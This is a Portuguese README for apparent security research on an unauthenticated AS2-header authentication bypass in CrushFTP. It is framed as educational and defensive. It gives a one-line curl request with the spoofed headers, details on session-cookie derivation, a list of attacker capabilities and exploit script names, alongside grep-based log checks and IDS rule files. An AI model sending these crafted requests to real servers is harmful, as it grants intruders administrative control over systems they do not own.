
Pesquisa sobre bypass de autenticação AS2 no CrushFTP permitindo acesso administrativo não autenticado. Inclui scripts PoC, regras de detecção e análise técnica para fins educacionais e defensivos.
⚠️ IMPORTANTE: Esta vulnerabilidade foi corrigida pela CrushFTP em novembro de 2025. Esta pesquisa é publicada apenas para fins educacionais e defensivos.
📝 NOTA: Esta pesquisa é baseada em padrões de vulnerabilidade semelhantes ao CVE-2025-54309. O número exato do CVE pode diferir. Esta é uma pesquisa de segurança independente conduzida em um ambiente de laboratório doméstico controlado.
Este repositório documenta uma vulnerabilidade crítica de bypass de autenticação em servidores CrushFTP que permite acesso administrativo completo através da manipulação de cabeçalhos AS2 (Applicability Statement 2). A vulnerabilidade não requer nenhuma autenticação e pode ser explorada com uma única requisição HTTP.
Pontos Principais:
Pesquisador: SmileyFace101 (@SmileyFace101)
A interface web do CrushFTP confia incorretamente em cabeçalhos de protocolo AS2 sem a devida validação. O servidor assume que requisições AS2 são pré-autenticadas e ignora os procedimentos normais de autenticação.
Versões Vulneráveis do CrushFTP (Confirmadas em Laboratório):
Versões Corrigidas:
Ambiente de Laboratório:
X-DMZ-Proxy: disabled
X-AS2-Version: 1.0
User-Agent: AS2Server/1.0
Exemplo (Ambiente de Laboratório):
curl -H "X-DMZ-Proxy: disabled" \
-H "X-AS2-Version: 1.0" \
-H "User-Agent: AS2Server/1.0" \
"http://10.0.100.50/WebInterface/admin/index.html"
Nota: Use apenas em sistemas que você possui ou tem permissão explícita para testar.
Durante a exploração, descobrimos uma relação matemática na geração de cookies de sessão que torna a exploração 100% confiável:
Estrutura do CrushAuth: [TIMESTAMP]_[SESSION_ID]
currentAuth = Últimos 4 caracteres do SESSION_ID
Parâmetro c2f = Mesmo valor que currentAuth
| Aspecto de Segurança | Nível de Impacto | Descrição |
|---|---|---|
| Confidencialidade | 🔴 CRÍTICO | Acesso completo a credenciais, configurações, chaves PGP, logs |
| Integridade | 🔴 CRÍTICO | Criação de contas de usuário, alterações de configuração, modificações de arquivos |
| Disponibilidade | 🟡 ALTO | Execução de comandos do sistema, capacidade de interrupção de serviço |
| Escalação de Privilégio | 🔴 CRÍTICO | Acesso direto de administrador, criação de conta persistente |
✅ Enumeração completa do servidor e de usuários
✅ Criação e modificação de contas de usuário
✅ Acesso e navegação no sistema de arquivos
✅ Execução de comandos via interface telnet
✅ Agendamento de tarefas com privilégios de sistema
✅ Acesso a chaves PGP e certificados
✅ Modificação de configurações administrativas
Veja o diretório detection/ para:
X-DMZ-Proxy: disabled
X-AS2-Version: 1.0
User-Agent: AS2Server/1.0
/WebInterface/function/ com cabeçalhos AS2# Logs do servidor web
grep -E "(X-DMZ-Proxy|X-AS2-Version|AS2Server)" /var/log/nginx/access.log
# Logs de aplicação do CrushFTP
grep -E "(WebInterface/admin|WebInterface/function)" crushftp.log
.
├── README.md # Este arquivo - visão geral e uso
├── docs/
│ └── TECHNICAL_ANALYSIS.md # Análise técnica completa
├── exploits/
│ ├── enhanced_session_exploit.sh # Exploração completa com gerenciamento de sessão
│ ├── targeted_exploitation.sh # Testes em endpoints de alto valor
│ └── adaptive_exploitation.sh # Abordagem multiestratégia
└── detection/
├── snort_rules.txt # Assinaturas IDS/IPS (Snort)
├── suricata_rules.txt # Assinaturas IDS/IPS (Suricata)
└── log_analysis.sh # Análise de logs e detecção de IOCs
Leia a documentação:
Teste em seu laboratório:
# Certifique-se de que você é o proprietário do sistema alvo!
./exploits/enhanced_session_exploit.sh 10.0.100.50
Implante a detecção: